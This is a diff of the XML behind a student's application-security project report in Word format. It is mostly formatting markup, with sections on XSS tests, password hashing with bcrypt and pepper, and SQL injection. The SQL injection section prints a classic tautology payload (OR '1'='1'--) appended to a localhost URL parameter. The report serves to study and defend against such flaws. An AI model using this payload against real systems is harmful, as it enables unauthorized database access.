+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="040C0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="040C001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="7200" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4A5A1099"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="4268E1E0"/>
@@ -1191,7 +1985,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="54B27D0C"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="0409001D"/>
@@ -1277,7 +2071,120 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="686D5D4F"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="B6C2D42E"/>
+    <w:lvl w:ilvl="0" w:tplc="040C0001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="040C0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="040C0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="040C0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="040C0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="040C0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="040C0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="040C0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="040C0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="7200" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6D702056"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="04090023"/>
@@ -1364,7 +2271,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7273740B"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="0409001F"/>
@@ -1487,16 +2394,22 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="12">
-    <w:abstractNumId w:val="13"/>
+    <w:abstractNumId w:val="15"/>
   </w:num>
   <w:num w:numId="13">
+    <w:abstractNumId w:val="12"/>
+  </w:num>
+  <w:num w:numId="14">
     <w:abstractNumId w:val="11"/>
   </w:num>
-  <w:num w:numId="14">
+  <w:num w:numId="15">
+    <w:abstractNumId w:val="14"/>
+  </w:num>
+  <w:num w:numId="16">
     <w:abstractNumId w:val="10"/>
   </w:num>
-  <w:num w:numId="15">
-    <w:abstractNumId w:val="12"/>
+  <w:num w:numId="17">
+    <w:abstractNumId w:val="13"/>
   </w:num>
 </w:numbering>
 </file>
@@ -1523,7 +2436,7 @@
     <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
     <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
     <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="3" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 3" w:semiHidden="1" w:uiPriority="3" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 3" w:semiHidden="1" w:uiPriority="4" w:unhideWhenUsed="1" w:qFormat="1"/>
     <w:lsdException w:name="heading 4" w:semiHidden="1" w:uiPriority="3" w:unhideWhenUsed="1" w:qFormat="1"/>
     <w:lsdException w:name="heading 5" w:semiHidden="1" w:uiPriority="3" w:unhideWhenUsed="1" w:qFormat="1"/>
     <w:lsdException w:name="heading 6" w:semiHidden="1" w:uiPriority="9" w:qFormat="1"/>
@@ -3394,7 +4307,6 @@
     <w:name w:val="List Paragraph"/>
     <w:basedOn w:val="Normal"/>
     <w:uiPriority w:val="34"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
     <w:pPr>
@@ -4124,41 +5036,6 @@
   <w:docParts>
     <w:docPart>
       <w:docPartPr>
-        <w:name w:val="D1369B47B62748B39D8C9FD91A824896"/>
-        <w:category>
-          <w:name w:val="Général"/>
-          <w:gallery w:val="placeholder"/>
-        </w:category>
-        <w:types>
-          <w:type w:val="bbPlcHdr"/>
-        </w:types>
-        <w:behaviors>
-          <w:behavior w:val="content"/>
-        </w:behaviors>
-        <w:guid w:val="{9880F6F5-532D-4CF0-A446-8D45D1048B22}"/>
-      </w:docPartPr>
-      <w:docPartBody>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="D1369B47B62748B39D8C9FD91A824896"/>
-          </w:pPr>
-          <w:r>
-            <w:rPr>
-              <w:lang w:bidi="fr-FR"/>
-            </w:rPr>
-            <w:t xml:space="preserve">[Titre de </w:t>
-          </w:r>
-          <w:r>
-            <w:rPr>
-              <w:lang w:bidi="fr-FR"/>
-            </w:rPr>
-            <w:t>12 mots maximum sur une ou deux lignes]</w:t>
-          </w:r>
-        </w:p>
-      </w:docPartBody>
-    </w:docPart>
-    <w:docPart>
-      <w:docPartPr>
         <w:name w:val="379F0579434749DC8DE4B00974D8506E"/>
         <w:category>
           <w:name w:val="Général"/>
@@ -4205,6 +5082,20 @@
     <w:family w:val="roman"/>
     <w:pitch w:val="variable"/>
     <w:sig w:usb0="E0002EFF" w:usb1="C000785B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+  </w:font>
+  <w:font w:name="Courier New">
+    <w:panose1 w:val="02070309020205020404"/>
+    <w:charset w:val="00"/>
+    <w:family w:val="modern"/>
+    <w:pitch w:val="fixed"/>
+    <w:sig w:usb0="E0002EFF" w:usb1="C0007843" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+  </w:font>
+  <w:font w:name="Wingdings">
+    <w:panose1 w:val="05000000000000000000"/>
+    <w:charset w:val="02"/>
+    <w:family w:val="auto"/>
+    <w:pitch w:val="variable"/>
+    <w:sig w:usb0="00000000" w:usb1="10000000" w:usb2="00000000" w:usb3="00000000" w:csb0="80000000" w:csb1="00000000"/>
   </w:font>
   <w:font w:name="SimSun">
     <w:altName w:val="宋体"/>
@@ -4270,7 +5161,9 @@
   </w:compat>
   <w:rsids>
     <w:rsidRoot w:val="00D3385B"/>
+    <w:rsid w:val="0046769F"/>
     <w:rsid w:val="00D3385B"/>
+    <w:rsid w:val="00DC22BC"/>
   </w:rsids>
   <m:mathPr>
     <m:mathFont m:val="Cambria Math"/>
@@ -4919,6 +5812,14 @@
   <w:style w:type="paragraph" w:customStyle="1" w:styleId="EE9D5025A95E42CFB19CB8A4182FD3C3">
     <w:name w:val="EE9D5025A95E42CFB19CB8A4182FD3C3"/>
   </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="7BCAD9734419407C90B2B1F15C7C4ECC">
+    <w:name w:val="7BCAD9734419407C90B2B1F15C7C4ECC"/>
+    <w:rsid w:val="0046769F"/>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="0CB376AC2B6647B084B78C5B5267A4D1">
+    <w:name w:val="0CB376AC2B6647B084B78C5B5267A4D1"/>
+    <w:rsid w:val="0046769F"/>
+  </w:style>
 </w:styles>
 </file>
 
@@ -5197,7 +6098,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4AE82A57-8273-44E8-9B96-2947D839FE3C}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{68E1302D-60A2-4D57-8734-740A4BDC4EF0}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Rapport - Securite des applications (projet).docx
+++ b/Rapport - Securite des applications (projet).docx
@@ -5,6 +5,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Titre20"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -15,21 +16,38 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Kevin Valerio</w:t>
-      </w:r>
-      <w:r>
+        <w:t xml:space="preserve">Kevin Valerio  -   </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId9" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+            <w:sz w:val="28"/>
+            <w:szCs w:val="28"/>
+          </w:rPr>
+          <w:t>valerio.kevin83@gmail.com</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre20"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">  -   </w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>valerio.kevin83@gmail.com</w:t>
+        <w:t>This projet has been made alone</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -107,7 +125,6 @@
                 <w:bCs w:val="0"/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="0" w:name="_GoBack" w:colFirst="2" w:colLast="2"/>
             <w:r>
               <w:rPr>
                 <w:b w:val="0"/>
@@ -745,6 +762,87 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Titre20"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>XSS #</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>9</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t> </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3005" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3006" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
               <w:rPr>
                 <w:b w:val="0"/>
                 <w:bCs w:val="0"/>
@@ -1045,19 +1143,10 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Titre20"/>
-              <w:rPr>
-                <w:b w:val="0"/>
-                <w:bCs w:val="0"/>
-              </w:rPr>
             </w:pPr>
             <w:r>
               <w:t>Success</w:t>
             </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Titre20"/>
-            </w:pPr>
           </w:p>
         </w:tc>
         <w:tc>
@@ -1125,11 +1214,6 @@
               <w:t>Success</w:t>
             </w:r>
           </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Titre20"/>
-            </w:pPr>
-          </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
@@ -1187,19 +1271,10 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Titre20"/>
-              <w:rPr>
-                <w:b w:val="0"/>
-                <w:bCs w:val="0"/>
-              </w:rPr>
             </w:pPr>
             <w:r>
               <w:t>Success</w:t>
             </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Titre20"/>
-            </w:pPr>
           </w:p>
         </w:tc>
         <w:tc>
@@ -1233,7 +1308,6 @@
           </w:p>
         </w:tc>
       </w:tr>
-      <w:bookmarkEnd w:id="0"/>
     </w:tbl>
     <w:p>
       <w:pPr>
@@ -1271,13 +1345,13 @@
           <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6B2FB9E7">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
-              <wp:posOffset>-726012</wp:posOffset>
+              <wp:posOffset>-635737</wp:posOffset>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>298273</wp:posOffset>
+              <wp:posOffset>276461</wp:posOffset>
             </wp:positionV>
-            <wp:extent cx="7367905" cy="3782060"/>
-            <wp:effectExtent l="0" t="0" r="4445" b="8890"/>
+            <wp:extent cx="7088036" cy="1540938"/>
+            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
             <wp:wrapSquare wrapText="bothSides"/>
             <wp:docPr id="1" name="Image 1"/>
             <wp:cNvGraphicFramePr>
@@ -1290,26 +1364,33 @@
                     <pic:cNvPr id="1" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId9">
+                  <pic:blipFill rotWithShape="1">
+                    <a:blip r:embed="rId10">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                         </a:ext>
                       </a:extLst>
                     </a:blip>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
+                    <a:srcRect t="12204" b="45417"/>
+                    <a:stretch/>
                   </pic:blipFill>
-                  <pic:spPr>
+                  <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="7367905" cy="3782060"/>
+                      <a:ext cx="7088036" cy="1540938"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                    <a:extLst>
+                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                      </a:ext>
+                    </a:extLst>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -1326,8 +1407,10 @@
       <w:r>
         <w:t>Vulnerable program</w:t>
       </w:r>
-    </w:p>
-    <w:p/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Titre3"/>
@@ -1347,24 +1430,12 @@
       <w:r>
         <w:t xml:space="preserve">Visit </w:t>
       </w:r>
-      <w:hyperlink r:id="rId10" w:history="1">
+      <w:hyperlink r:id="rId11" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
           </w:rPr>
-          <w:t>h</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Lienhypertexte"/>
-          </w:rPr>
-          <w:t>ttp://127.0.0.1/Password%20Management/attack/?username=</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Lienhypertexte"/>
-          </w:rPr>
-          <w:t>xxx</w:t>
+          <w:t>http://127.0.0.1/Password%20Management/attack/?username=xxx</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -1399,7 +1470,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
+                    <a:blip r:embed="rId12"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1421,26 +1492,3116 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>Password is not hashed</w:t>
-      </w:r>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Password is not hashed. Meaning everyone can use this password and log-in with it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="1800"/>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Titre3"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1DD08A7C">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>-553085</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>347980</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6977380" cy="2296160"/>
+            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
+            <wp:wrapSquare wrapText="bothSides"/>
+            <wp:docPr id="35" name="Image 35"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6977380" cy="2296160"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="margin">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="margin">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
         <w:t>Defense system</w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p>
       <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="720" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>We use</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> the Bcrypt algorithm, with a cost of 12 (recommended), in order to hash the SHA256 value of the concatenation of a pepper and the plain-text password.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Salt is included in the default implementation of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>password_hash</w:t>
+      </w:r>
+      <w:r>
+        <w:t>() function.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="720" w:firstLine="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="720" w:firstLine="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>SQL Injection</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteReference w:id="2"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Vulnerable program</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37F83ADA" wp14:editId="4075A685">
+            <wp:extent cx="5433237" cy="3061970"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
+            <wp:docPr id="2" name="Image 2"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5442295" cy="3067075"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="17"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Visit </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId15" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+          </w:rPr>
+          <w:t>http://127.0.0.1/Password%20Management/attack/?username=xxx</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> OR ‘1’=’1’—</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="17"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
